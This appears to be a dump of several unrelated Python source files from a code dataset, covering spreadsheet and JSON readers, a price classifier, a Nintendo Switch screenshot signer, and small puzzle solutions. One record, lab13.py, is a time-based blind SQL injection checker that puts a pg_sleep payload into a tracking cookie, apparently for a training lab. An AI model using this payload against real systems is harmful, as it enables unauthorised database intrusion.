xlrd.biffh.XLRDError:\n sheet = book.sheet_by_index(0)\n\n table = [\n [common.basestring(c.value) for c in sheet.row(i)]\n for i in xrange(sheet.nrows)\n ]\n\n use_openpyxl = False\n\n except IOError:\n\n raise FileNotFoundError(xls_file)\n\n except Exception as e:\n\n _log('Failed to read by xlrd, falling back to openpyxl.')\n _logger._log_traceback()\n use_openpyxl = True\n\n if use_openpyxl:\n\n try:\n\n _log('Reading XLS(X) by openpyxl.')\n\n book = openpyxl.load_workbook(\n filename = xls_file,\n read_only = True,\n data_only = True,\n )\n\n except Exception as e:\n\n _log(f'Failed to read `{xls_file}` by openpyxl.')\n _logger._log_traceback()\n raise ValueError('Could not open xls: %s' % xls_file)\n\n try:\n\n if type(sheet) is int:\n sheet = book.worksheets[sheet]\n else:\n sheet = book[sheet]\n\n except:\n\n sheet = book.worksheets[0]\n\n # this is to suppress the openpyxl unknown extension warnings\n # which we can not avoid as the xlsx files were produced not by us\n with warnings.catch_warnings():\n\n warnings.simplefilter('ignore')\n\n table = [\n [\n (\n cell\n if isinstance(cell, str) else\n cell.value\n if cell is not None else\n ''\n )\n for cell in row\n ]\n for row in (sheet[cell_range] if cell_range else sheet.values)\n ]\n\n if 'book' in locals() and hasattr(book, 'release_resources'):\n\n book.release_resources()\n\n if opened_here:\n\n xls_file.close()\n\n return table\n\n\ndef csv_sep_change(csv, old, new):\n\n clean_csv = []\n bw_quotes = False\n\n for char in csv:\n if char == '\\r':\n continue\n elif char == '\"':\n bw_quotes = not bw_quotes\n elif char == '\\n':\n if not bw_quotes:\n clean_csv.append(char)\n else:\n clean_csv.append(' ')\n elif char == old:\n if bw_quotes:\n clean_csv.append(char)\n else:\n clean_csv.append(new)\n else:\n clean_csv.append(char)\n\n return ''.join(clean_csv)\n\n\ndef _try_isoform(name):\n\n name = name.split('-')\n\n if len(name) > 1 and name[1].isdigit():\n\n isoform = int(name[1])\n main = name[0]\n\n else:\n\n main = '-'.join(name)\n isoform = None\n\n return main, isoform\n\n\ndef read_table(\n cols,\n fileObject = None,\n data = None,\n sep = '\\t',\n sep2 = None,\n rem = None,\n hdr = None,\n encoding = 'ascii',\n ):\n \"\"\"\n Generic function to read data tables.\n\n fileObject : file-like\n Any file like object: file opened for read, or StringIO buffer\n cols : dict\n Dictionary of columns to read. Keys identifying fields are returned\n in the result. Values are column numbers.\n sep : str\n Field separator of the file.\n sep2 : dict\n Subfield separators and prefixes.\n E.g. {2: ',', 3: '|'}\n hdr : int\n Number of header lines. If None, no headers assumed.\n rem : list\n Strings to remove. For each line these elements will be replaced with ''.\n \"\"\"\n\n rem = rem or []\n\n if data is None:\n\n if hasattr(fileObject, 'readline'):\n\n fileObject.seek(0)\n\n if hdr:\n\n for h in xrange(0, hdr):\n\n _ = next(fileObject)\n\n data = fileObject\n\n else:\n\n data = [l.strip() for l in data.split('\\n') if len(l) > 0][hdr:]\n\n res = []\n\n for l in data:\n\n if type(l) is bytes:\n\n l = l.decode(encoding)\n\n for r in rem:\n\n l = l.replace(r, '')\n\n l = [f.strip() for f in l.split(sep)]\n\n if len(l) > max(cols.values()):\n\n dic = {}\n\n for name, col in iteritems(cols):\n\n field = l[col].strip()\n\n _sep2 = (\n sep2[col]\n if isinstance(sep2, dict) and col in sep2 else\n sep2\n if isinstance(sep2, common.basestring) else\n None\n )\n\n if _sep2:\n\n field = tuple(\n sf.strip()\n for sf in field.split(_sep2)\n if sf\n )\n\n dic[name] = field\n\n res.append(dic)\n\n if fileObject is not None:\n\n fileObject.close()\n\n return res\n\n\ndef json_extract(\n data: Union[dict, list, str, IO],\n spec: dict,\n ) -> List[dict]:\n \"\"\"\n Extracts fields of arbitrary depth from JSON data into a list of dicts.\n\n Args\n data: JSON as a string or a file-like object.\n spec: Dict of glom field specifications.\n \"\"\"\n\n data = json_read(data)\n\n if isinstance(data, dict):\n\n data = [data]\n\n if not isinstance(data, list):\n\n msg = 'Don\\'t know how to process data of type `%s`.' % type(data)\n raise TypeError(msg)\n\n\n return [\n glom.glom(rec, spec, default = constants.GLOM_ERROR)\n for rec in data\n ]\n\n\ndef json_read(data: Union[str, IO, Any]) -> Union[list, dict, Any]:\n \"\"\"\n Reads JSON from file or string, pass through for any other value.\n \"\"\"\n\n if isinstance(data, IO):\n\n data = json.load(data)\n\n elif isinstance(data, str):\n\n data = json.loads(data)\n\n return data\n\n\nGlomSpec = Union[str, tuple, dict, Callable]\n\nGlomFields = Union[\n List[str],\n Dict[str, GlomSpec]\n]\n\ndef glom_fields(fields: Optional[GlomFields] = None) -> Dict[str, GlomSpec]:\n \"\"\"\n Generates a glom spec dict from a list or dict, protecting each field\n by glom.Coalesce.\n \"\"\"\n\n fields = fields or {}\n\n fields = fields if isinstance(fields, dict) else dict(zip(fields, fields))\n\n fields = dict(\n (\n k,\n glom.Coalesce(v, default = None)\n )\n for k, v in fields.items()\n )\n\n return fields\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7922,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"22030535984","text":"from sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.pipeline import FeatureUnion\n\n\nclass Result:\n\n def __init__(self):\n values = self.input_values()\n self.name = values[0]\n self.provider = values[1]\n self.price = values[2]\n\n def input_values(self):\n name = input(\"Podaj nazwę usługi: \")\n provider = input(\"Podaj providera (aws/azure/gcp): \")\n if provider.lower().strip() not in [\"aws\", \"azure\", \"gcp\"]:\n return self.input_values()\n price = input(\"Podaj cenę: \")\n if not price.replace(\".\", \"\", 1).isdigit():\n return self.input_values()\n return [name, provider, price]\n\n def get_result(self, df, data):\n texts = []\n categories = []\n for category in data:\n for platform in data[category]:\n texts.append(\" \".join(data[category][platform]))\n categories.append(category)\n text_clf = Pipeline([\n ('union',\n FeatureUnion(\n transformer_list=[('cv_word', CountVectorizer()),\n ('cv_char', CountVectorizer(analyzer=\"char\"))],\n transformer_weights={\n 'cv_word': 0.8,\n 'cv_char': 0.2\n },\n )), ('clf', MultinomialNB())\n ])\n text_clf.fit(texts, categories)\n predicted_category = text_clf.predict([self.name])\n df = df[df['category'] == predicted_category[0]]\n y_median = ['aws_median', 'azure_median', 'gcp_median']\n x_median = df[f'{self.provider}_median'].values[0]\n y_median.remove(f'{self.provider}_median')\n factor = float(self.price) / x_median\n print(f\"Przybliżona kategoria: {predicted_category[0]}\")\n for median in y_median:\n val = \"{:.2f}\".format(df[median].values[0] * factor)\n print(\n f\"Szacowana cena w {median.replace('_median', '').upper()}: {val}\")\n","repo_name":"Nemryk/Provider-Price-Checking","sub_path":"result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35275654827","text":"import os\nimport io\nimport hmac\nimport json\nimport piexif\nimport shutil\nimport appdirs\nimport rarfile\nimport zipfile\nimport tempfile\nfrom sys import exit\nfrom PIL import Image\nfrom AnyQt import QtCore\nfrom hashlib import sha256\nfrom datetime import datetime\nfrom pyforms.basewidget import BaseWidget\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlCombo\nfrom pyforms.controls import ControlLabel\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlFilesTree\nfrom pyforms.controls import ControlDockWidget\nfrom AnyQt.QtWidgets import QTreeView, QFileSystemModel\n\ngames_json = {\n\t\"Home Menu (Default)\": \"57B4628D2267231D57E0FC1078C0596D\",\n\t\"Home Menu (Controllers)\": \"1E95E5926F1CB99A87326D927F27B47E\",\n\t\"Home Menu (Profiles)\": \"CCFA659F4857F96DDA29AFEDB2E166E6\",\n\t\"1-2-Switch\": \"2B1F1288BC05B2D89D8431910DBA2878\",\n\t\"Crash Bandicoot N.sane Trilogy\": \"3D8E1DE4D671F7453AFA0C395B825E90\",\n\t\"Kirby Star Allies\": \"B20FAEC679A3A9320864DC374CFB9713\",\n\t\"Mario + Rabbids Kingdom Battle\": \"9600BAE614E6833B1A261F5FB229CDBA\",\n\t\"Mario Kart 8 Deluxe\": \"16851BE00BC6068871FE49D98876D6C5\",\n\t\"Octopath Traveler\": \"93C1C73A3BAF9123A15B9B24886B634B\",\n\t\"Puyo Puyo Tetris\": \"0585E865DFB68B5298F19360A730EDB3\",\n\t\"Snake Pass\": \"554C97481EFDFC30DCDF01FC5CC877A6\",\n\t\"Sonic Mania\": \"1628E0CE3F839127054B0EE36E28E52A\",\n\t\"Splatoon 2\": \"397A963DA4660090D65D330174AC6B04\",\n\t\"Super Mario Odyssey\": \"8AEDFF741E2D23FBED39474178692DAF\",\n\t\"The Legend of Zelda: Breath of the Wild\": \"F1C11A22FAEE3B82F21B330E1B786A39\",\n\t\"Xenoblade Chronicles 2\": \"659B13F48903294AE2B3FA4F12DA9898\",\n\t\"Xenoblade Chronicles 2: Torna - The Golden Country\": \"4CBEE39065EC88984BABA68A511DDD19\"\n}\n\nsettings_json = {\n\t\"outputfolder\": \".\",\n\t\"hmackey\": \"\",\n\t\"customgameid\": \"57B4628D2267231D57E0FC1078C0596D\",\n\t\"type\": \"image\",\n\t\"direction\": \"ltr\"\n}\n\n#From my testing, piexif's _dump._get_thumbnail() returns an invalid thumbnail for the Switch (it shows a \"?\"). What we can do though is replace it with this dirty fix.\n#There's probably a better way to do it, like using a different library, but eh, it works™ ¯\\_(ツ)_/¯\n#From StackOverflow (Monkey Patching): https://stackoverflow.com/questions/10429547/how-to-change-a-function-in-existing-3rd-party-library-in-python\npiexif._dump._get_thumbnail = lambda jpeg: jpeg #Return it as it is, no need to modify it.\n\ndef resizeImage(path, sizeX, sizeY, state, secondFilePath):\n\tsize = (sizeX, sizeY)\n\tresizedImage = Image.new(\"RGB\", size, (0, 0, 0))\n\timage1 = Image.open(path).convert(\"RGB\")\n\timage1.thumbnail(size)\n\twidth1, height1 = image1.size\n\tif state != 0 and secondFilePath != \"\":\n\t\timage2 = Image.open(secondFilePath).convert(\"RGB\")\n\t\timage2.thumbnail(size)\n\t\twidth2, height2 = image2.size\n\t\tif state == 1:\n\t\t\tresizedImage.paste(image1, (int(sizeX/2-width1), int((sizeY-height1)/2)))\n\t\t\tresizedImage.paste(image2, (int(sizeX/2), int((sizeY-height2)/2)))\n\t\telse:\n\t\t\tresizedImage.paste(image2, (int(sizeX/2-width2), int((sizeY-height2)/2)))\n\t\t\tresizedImage.paste(image1, (int(sizeX/2), int((sizeY-height1)/2)))\n\telse:\n\t\tresizedImage.paste(image1, (int((sizeX - width1) / 2), int((sizeY - height1) / 2)))\n\treturn resizedImage\n\ndef createJPEGExif(exifDict, makerNote, timestamp, thumbnail):\n\tnewExifDict = exifDict.copy()\n\tnewExifDict.update({\n\t\t\"Exif\": {36864: b\"0230\", 37121: b\"\\x01\\x02\\x03\\x00\", 40962: 1280, 40963: 720, 40960: b\"0100\", 40961: 1, 37500: makerNote},\n\t\t\"0th\": {274: 1, 531: 1, 296: 2, 34665: 164, 282: (72, 1), 283: (72, 1), 306: timestamp, 271: \"Nintendo co., ltd\"},\n\t\t\"1st\": {513: 1524, 514: 32253, 259: 6, 296: 2, 282: (72, 1), 283: (72, 1)},\n\t\t\"thumbnail\": thumbnail\n\t\t})\n\treturn newExifDict\n\ndef getImageHmac(key, input):\n\treturn hmac.new(key, input, sha256).digest()\n\ndef processFile(fileName, key, titleID, baseOutputFolder, state = 0, secondFilePath = None):\n\tdate = datetime.now()\n\toutputFolder = baseOutputFolder + date.strftime(\"/Nintendo/Album/%Y/%m/%d/\")\n\tind = 0\n\twhile os.path.isfile(outputFolder + date.strftime(\"%Y%m%d%H%M%S\") + \"{:02d}\".format(ind) + \"-\" + titleID + \".jpg\"):\n\t\tind += 1\n\t\tif ind > 99:\n\t\t\tdate = datetime.now()\n\t\t\toutputFolder = date.strftime(\"SD/Nintendo/Album/%Y/%m/%d/\")\n\t\t\tind = 0\n\toutputPath = outputFolder + date.strftime(\"%Y%m%d%H%M%S\") + \"{:02d}\".format(ind) + \"-\" + titleID + \".jpg\"\n\tos.makedirs(outputFolder, exist_ok=True)\n\tinputImage = io.BytesIO()\n\toutputImage = io.BytesIO()\n\tthumbnail = io.BytesIO()\n\tresizeImage(fileName, 1280, 720, state, secondFilePath).save(inputImage, \"JPEG\", quality = 80) #The screenshots must have a size of 1280x720\n\tresizeImage(fileName, 320, 180, state, secondFilePath).save(thumbnail, \"JPEG\", quality = 40) #The thumbnails (at least on my screenshots) have a size of 320x180\n\tmakerNoteZero = b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x10\\x00\" + bytes.fromhex(titleID)\n\ttimestamp = date.strftime(\"%Y:%m:%d %H:%M:%S\")\n\texifData = piexif.dump(createJPEGExif(piexif.load(inputImage.getvalue()), makerNoteZero, timestamp, thumbnail.getvalue()))\n\tpiexif.insert(exifData, inputImage.getvalue(), outputImage)\n\tmakerNote = b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\" + getImageHmac(key, outputImage.getvalue())[:16] + b\"\\x01\\x00\\x10\\x00\" + bytes.fromhex(titleID)\n\toutputBytes = outputImage.getvalue().replace(makerNoteZero, makerNote)\n\twith open(outputPath, \"wb\") as file:\n\t\tfile.write(outputBytes)\n\nclass SettingsWindow(BaseWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tglobal settings_json\n\t\tBaseWidget.__init__(self, \"Settings\")\n\t\tself._settingslabel = ControlLabel(\"Settings\")\n\t\tself._outputfolder = ControlText(\"SD Card Path\")\n\t\tself._outputfolder.value = settings_json[\"outputfolder\"]\n\t\tself._hmackey = ControlText(\"Capsrv HMAC Secret\")\n\t\tself._hmackey.value = settings_json[\"hmackey\"]\n\t\tself._customgameid = ControlText(\"Custom Game ID\")\n\t\tself._customgameid.value = settings_json[\"customgameid\"]\n\t\tself._typelabel = ControlLabel(\"Type\")\n\t\tself._imagecheckbox = ControlCheckBox(\"Image\")\n\t\tself._imagecheckbox.value = (settings_json[\"type\"] == \"image\")\n\t\tself._imagecheckbox.changed_event = self.imageCheckbox\n\t\tself._mangacheckbox = ControlCheckBox(\"Manga\")\n\t\tself._mangacheckbox.value = (settings_json[\"type\"] == \"manga\")\n\t\tself._mangacheckbox.changed_event = self.mangaCheckbox\n\t\tself._comiccheckbox = ControlCheckBox(\"Comics\")\n\t\tself._comiccheckbox.value = (settings_json[\"type\"] == \"comics\")\n\t\tself._comiccheckbox.changed_event = self.comicCheckbox\n\t\tself._directionlabel = ControlLabel(\"Direction\")\n\t\tself._directionlabel.hide()\n\t\tself._lefttoright = ControlCheckBox(\"From left to right\")\n\t\tself._lefttoright.hide()\n\t\tself._lefttoright.value = (settings_json[\"direction\"] == \"ltr\")\n\t\tself._lefttoright.changed_event = self.fromLeftToRight\n\t\tself._righttoleft = ControlCheckBox(\"From right to left\")\n\t\tself._righttoleft.hide()\n\t\tself._righttoleft.value = (settings_json[\"direction\"] == \"rtl\")\n\t\tself._righttoleft.changed_event = self.fromRightToLeft\n\t\tself._savebutton = ControlButton(\"Save\")\n\t\tself._savebutton.value = self.saveButton\n\t\tself.formset = [(\"_settingslabel\"), (\"_outputfolder\"), (\"_hmackey\"), (\"_customgameid\"), (\"_typelabel\"), (\"_imagecheckbox\", \"_mangacheckbox\", \"_comiccheckbox\"), (\"_directionlabel\"), (\"_lefttoright\", \"_righttoleft\"), (\" \"), (\" \", \" \", \"_savebutton\")]\n\t\tself._typerequested = False\n\t\tself._directionrequested = False\n\n\t#Reimplementing radio buttons sure is fun\n\tdef imageCheckbox(self):\n\t\tif self._typerequested:\n\t\t\treturn\n\t\tself._typerequested = True\n\t\tself._mangacheckbox.value = False\n\t\tself._comiccheckbox.value = False\n\t\tself._imagecheckbox.value = True\n\t\tself._directionlabel.hide()\n\t\tself._lefttoright.hide()\n\t\tself._righttoleft.hide()\n\t\tself._typerequested = False\n\n\tdef comicCheckbox(self):\n\t\tif self._typerequested:\n\t\t\treturn\n\t\tself._typerequested = True\n\t\tself._mangacheckbox.value = False\n\t\tself._comiccheckbox.value = True\n\t\tself._imagecheckbox.value = False\n\t\tself._directionlabel.show()\n\t\tself._lefttoright.show()\n\t\tself._righttoleft.show()\n\t\tself._typerequested = False\n\n\tdef mangaCheckbox(self):\n\t\tif self._typerequested:\n\t\t\treturn\n\t\tself._typerequested = True\n\t\tself._mangacheckbox.value = True\n\t\tself._comiccheckbox.value = False\n\t\tself._imagecheckbox.value = False\n\t\tself._directionlabel.show()\n\t\tself._lefttoright.show()\n\t\tself._righttoleft.show()\n\t\tself._typerequested = False\n\n\tdef fromLeftToRight(self):\n\t\tif self._directionrequested:\n\t\t\treturn\n\t\tself._directionrequested = True\n\t\tself._lefttoright.value = True\n\t\tself._righttoleft.value = False\n\t\tself._directionrequested = False\n\n\tdef fromRightToLeft(self):\n\t\tif self._directionrequested:\n\t\t\treturn\n\t\tself._directionrequested = True\n\t\tself._lefttoright.value = False\n\t\tself._righttoleft.value = True\n\t\tself._directionrequested = False\n\n\tdef saveButton(self):\n\t\tglobal settings_json\n\t\ttyp = \"\"\n\t\tif not self._mangacheckbox.value and not self._comiccheckbox.value:\n\t\t\ttyp = \"image\"\n\t\telif self._mangacheckbox.value:\n\t\t\ttyp = \"manga\"\n\t\telse:\n\t\t\ttyp = \"comics\"\n\t\tdirection = \"\"\n\t\tif not self._righttoleft.value:\n\t\t\tdirection = \"ltr\"\n\t\telse:\n\t\t\tdirection = \"rtl\"\n\t\ttry:\n\t\t\ta = bytes.fromhex(self._hmackey.value)\n\t\t\tif(len(a) != 0x20 or sha256(a).hexdigest() != \"e9735dae330300b8bb4b5892c8178f5d57daa32d7b5ef5d15f14491800ce4750\"):\n\t\t\t\traise\n\t\texcept:\n\t\t\tself.alert(\"Invalid HMAC key!\", \"Error!\")\n\t\t\treturn\n\t\ttry:\n\t\t\ta = bytes.fromhex(self._customgameid.value)\n\t\t\tif(len(a) != 16) and self._customgameid.value != \"\":\n\t\t\t\traise ValueError\n\t\t\tif(self._customgameid.value == \"\"):\n\t\t\t\traise\n\t\texcept ValueError:\n\t\t\tself.alert(\"Invalid custom game ID!\", \"Error!\")\n\t\t\treturn\n\t\texcept:\n\t\t\tself._customgameid.value = \"57B4628D2267231D57E0FC1078C0596D\"\n\t\tif self._outputfolder.value == \"\":\n\t\t\tself._outputfolder.value = \".\"\n\t\tsettings_json = {\"outputfolder\": self._outputfolder.value, \"hmackey\": self._hmackey.value, \"customgameid\": self._customgameid.value, \"type\": typ, \"direction\": direction}\n\t\tjson.dump(settings_json, open(appdirs.AppDirs(\"NSScreenshotMaker\", \"\").user_data_dir+\"/settings.json\", \"w\"))\n\nclass FirstRun(BaseWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tBaseWidget.__init__(self, \"First Run Popup\")\n\t\tself._firstrunlabel = ControlLabel(\"Hello! It looks like this is your first time\\nrunning the app. Please go to the settings\\nand fill the encryption key before using\\nthe tool. Then, simply drag and drop your\\nfiles in the centre of the app and press\\n\\\"Go!\\\"\")\n\t\tself.formset = [(\"_firstrunlabel\"), (\" \"), (\" \")]\n\nclass NSScreenshotMakerGUI(BaseWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tglobal games_json\n\t\tsuper().__init__(\"NSScreenshotMaker\")\n\t\tself._tmpinputfolder = tempfile.mkdtemp()\n\t\tself._settingsbutton = ControlButton(\"⚙️\")\n\t\tself._settingsbutton.value = self.openSettings\n\t\tself._runbutton = ControlButton(\"Go!\")\n\t\tself._runbutton.value = self.go\n\t\tself._combo = ControlCombo(helptext=\"The game the Switch will think the screenshot is from\")\n\t\tself.gameslist = games_json\n\t\tfor k in self.gameslist:\n\t\t\tself._combo.add_item(k, self.gameslist[k])\n\t\tself._combo.add_item(\"Custom\", \"Custom\")\n\t\tself._combolabel = ControlLabel(\"Game ID\", helptext=\"The game the Switch will think the screenshot is from\")\n\t\tself._imagelist = ControlFilesTree()\n\t\tself._imagelist._form.setDragEnabled(True)\n\t\tself._imagelist._form.setAcceptDrops(True)\n\t\tself._imagelist._form.setDropIndicatorShown(True)\n\t\tself._imagelist._form.dropEvent = self.dropEvent\n\t\tmodel = QFileSystemModel(parent=None)\n\t\tmodel.setReadOnly(False)\n\t\tself._imagelist._form.setModel(model)\n\t\tmodel.setRootPath(QtCore.QDir.currentPath())\n\t\tself._imagelist._form.setRootIndex(model.setRootPath(self._tmpinputfolder))\n\t\tself._imagelist._form.setIconSize(QtCore.QSize(32, 32))\n\t\tself.formset=[(\"_combolabel\", \"_combo\", \"_settingsbutton\"), \"_imagelist\" , \"_runbutton\"]\n\t\tself._firstrunpanel = ControlDockWidget()\n\t\tself._firstrunpanel.hide()\n\t\tself._firstrunwin = FirstRun()\n\t\tif not os.path.isfile(appdirs.AppDirs(\"NSScreenshotMaker\", \"\").user_data_dir+\"/settings.json\"):\n\t\t\tself._firstrunwin.parent = self\n\t\t\tself._firstrunpanel.value = self._firstrunwin\n\t\t\tself._firstrunpanel.show()\n\t\t\tself._firstrunwin.show()\n\t\tself._settingspanel = ControlDockWidget()\n\t\tself._settingspanel.hide()\n\t\tself._settingswin = SettingsWindow()\n\n\tdef dropEvent(self, event):\n\t\tif event.mimeData().hasUrls:\n\t\t\tevent.setDropAction(QtCore.Qt.CopyAction)\n\t\t\tevent.accept()\n\t\t\t# to get a list of files:\n\t\t\tdrop_list = []\n\t\t\tfor url in event.mimeData().urls():\n\t\t\t\tdrop_list.append(str(url.toLocalFile()))\n\t\t\t# handle the list here\n\t\t\tfor f in drop_list:\n\t\t\t\ttry:\n\t\t\t\t\tif not f.endswith(\".cbr\") and not f.endswith(\".cbz\") and not f.endswith(\".zip\") and not f.endswith(\".rar\"):\n\t\t\t\t\t\tImage.open(f)\n\t\t\t\t\tshutil.copy(f, self._tmpinputfolder)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\telse:\n\t\t\tevent.ignore()\n\t\n\tdef closeEvent(self, event):\n\t\tshutil.rmtree(self._tmpinputfolder)\n\n\tdef openSettings(self):\n\t\tself._firstrunwin.close()\n\t\tself._firstrunpanel.hide()\n\t\tself._settingswin.close()\n\t\tself._settingswin.parent = self\n\t\tself._settingspanel.value = self._settingswin\n\t\tself._settingspanel.show()\n\t\tself._settingswin.show()\n\n\tdef go(self):\n\t\tglobal settings_json\n\t\tif len(os.listdir(self._tmpinputfolder)) == 0:\n\t\t\treturn\n\t\tprevFileName = \"\"\n\t\ttotalElements = 0\n\t\tstate = 0\n\t\tif settings_json[\"type\"] == \"manga\":\n\t\t\tstate = 1\n\t\tif settings_json[\"type\"] == \"comics\":\n\t\t\tstate = 2\n\t\tfor fileName in os.listdir(self._tmpinputfolder):\n\t\t\tprint(\"Processing file \" + fileName)\n\t\t\ttotalElements += 1\n\t\t\tif fileName.endswith(\".zip\") or fileName.endswith(\".cbz\"):\n\t\t\t\tzf = zipfile.ZipFile(self._tmpinputfolder+\"/\"+fileName)\n\t\t\t\tfor f in zf.infolist():\n\t\t\t\t\twith open(self._tmpinputfolder+\"/\"+f.filename, \"wb\") as fp:\n\t\t\t\t\t\tfp.write(zf.read(f))\n\t\t\telif fileName.endswith(\".rar\") or fileName.endswith(\".cbr\"):\n\t\t\t\trf = rarfile.RarFile(self._tmpinputfolder+\"/\"+fileName)\n\t\t\t\tfor f in rf.infolist():\n\t\t\t\t\twith open(self._tmpinputfolder+\"/\"+f.filename, \"wb\") as fp:\n\t\t\t\t\t\tfp.write(rf.read(f))\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tif state == 0:\n\t\t\t\t\t\tif list(self._combo._items.values())[self._combo.current_index] != \"Custom\":\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), list(self._combo._items.values())[self._combo.current_index], settings_json[\"outputfolder\"])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), settings_json[\"customgameid\"], settings_json[\"outputfolder\"])\n\t\t\t\t\telif prevFileName != \"\":\n\t\t\t\t\t\tif list(self._combo._items.values())[self._combo.current_index] != \"Custom\":\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), list(self._combo._items.values())[self._combo.current_index], settings_json[\"outputfolder\"], state, self._tmpinputfolder+\"/\"+prevFileName)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), settings_json[\"customgameid\"], settings_json[\"outputfolder\"], state, self._tmpinputfolder+\"/\"+prevFileName)\n\t\t\t\t\t\tprevFileName = \"\"\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tprevFileName = fileName\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\tif state != 0 and totalElements % 2 != 0:\n\t\t\tif list(self._combo._items.values())[self._combo.current_index] != \"Custom\":\n\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), list(self._combo._items.values())[self._combo.current_index], settings_json[\"outputfolder\"])\n\t\t\telse:\n\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), settings_json[\"customgameid\"], settings_json[\"outputfolder\"])\n\n\nif __name__ == '__main__':\n\tNSScreenshotMakerPath = appdirs.AppDirs(\"NSScreenshotMaker\", \"\").user_data_dir\n\tif not os.path.isdir(NSScreenshotMakerPath):\n\t\tos.mkdir(NSScreenshotMakerPath)\n\tif os.path.isfile(NSScreenshotMakerPath+\"/settings.json\"):\n\t\tsettings_json = json.load(open(NSScreenshotMakerPath+\"/settings.json\", \"r\"))\n\tfrom pyforms import start_app\n\tstart_app(NSScreenshotMakerGUI)\n#くコ:彡\n","repo_name":"cheuble/NSScreenshotMaker","sub_path":"NSScreenshotMaker.py","file_name":"NSScreenshotMaker.py","file_ext":"py","file_size_in_byte":16031,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"17462235511","text":"import math\n\n\ndef solution(i):\n \"\"\" A function which takes an integer between 0 and 10000 as input,\n uses it as the index number passed into a single string of all ordered prime numbers,\n and returns a 5-digit ID number of the next 5 digits in the string starting at the specified index. \"\"\"\n\n # function for checking the total concatenated character length of all values in a list given the addition of a new value\n length_list = []\n\n def get_total_length(x):\n length_list.append(len(str(x)))\n return sum(length_list)\n\n # creates a list of all prime numbers in order, up to a total concatenated character length of 10005\n # (prompt: # minions up to 10000 = starting index up to 10000, whose 5 digit ID would extend to index 10004)\n list_of_primes = [n for n in range(2, 100000) if all(n % m != 0 for m in range(2, int(math.sqrt(n)) + 1))\n if get_total_length(n) < 10005]\n\n # creates a single string of concatenated prime numbers\n string_of_primes = \"\".join(map(str, list_of_primes))\n\n # selects and return 5 digit ID based on the input\n minion_id = string_of_primes[i:i+5]\n return minion_id\n\n\nprint(solution(3))","repo_name":"anterra/google-foobar","sub_path":"challenge 1.py","file_name":"challenge 1.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37825048524","text":"# solution to hand cycle problem presented by Juan\r\n\r\n# n number of steps, t fingers\r\ndef formula(n, t):\r\n if n < 1: return n # before start of hand ..\r\n n, t = n - 1, t - 1\r\n return (n%t if n%(2*t) < t else t-n%t) + 1\r\n\r\nif __name__ == '__main__':\r\n # test 50 steps with 5 fingers\r\n for n in range(50):\r\n print(formula(n, 5))\r\n","repo_name":"UCSC-Interview-Prep/Coding-Problems","sub_path":"fingercycle.py","file_name":"fingercycle.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5921484366","text":"import requests\nimport sys\nimport urllib3\nimport urllib\nimport re\nfrom bs4 import BeautifulSoup\n\n# Disable SSL/TLS warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Configure proxy settings if needed\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n\ndef bilind_sql_check(url):\n sql_payload = \"'||pg_sleep(10)--\"\n sqli_encode = urllib.parse.quote(sql_payload)\n cookies = {'TrackingId':'a8QPFx9KdlWLvgQr'+ sqli_encode,'session':'tiA0TOYaCzSFu3hoyLwDrQVyuqsAYXMG'}\n r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)\n if int(r.elapsed.total_seconds())>10:\n print(\"(+) sql injection var\")\n else:\n print(\"(+) sql injection yok\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"[-] Usage: %s \" % sys.argv[0])\n print(\"[-] For Example: %s http://www.random.com\" % sys.argv[0])\n sys.exit(-1)\n \n url = sys.argv[1]\n print(\"(+) check if cookie sql\")\n bilind_sql_check(url)\n","repo_name":"efegorkemumit/sql_injection","sub_path":"lab13/lab13.py","file_name":"lab13.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70926831788","text":"import os.path\nimport sys\nimport traceback\n\nimport you_get\nimport openpyxl\nimport requests\nimport time\nfrom settings import 